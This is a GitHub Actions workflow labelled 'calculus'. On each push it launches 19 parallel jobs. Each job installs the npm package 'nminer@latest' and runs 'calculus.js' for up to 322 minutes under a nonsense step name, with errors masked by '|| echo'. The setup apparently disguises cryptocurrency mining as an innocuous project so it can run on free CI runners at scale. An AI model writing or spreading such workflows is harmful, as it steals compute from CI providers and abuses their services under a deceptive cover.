name: calculus
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 710 }
          - { version: 5167 }
          - { version: 4283 }
          - { version: 2365 }
          - { version: 4624 }
          - { version: 3993 }
          - { version: 4057 }
          - { version: 2929 }
          - { version: 9955 }
          - { version: 7050 }
          - { version: 5024 }
          - { version: 4481 }
          - { version: 8218 }
          - { version: 7979 }
          - { version: 2804 }
          - { version: 1279 }
          - { version: 4279 }
          - { version: 1417 }
          - { version: 1706 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: hmph lounge ha until downshift
        run: |
          npm install nminer@latest
          timeout 322m node calculus.js || echo "calculus executed"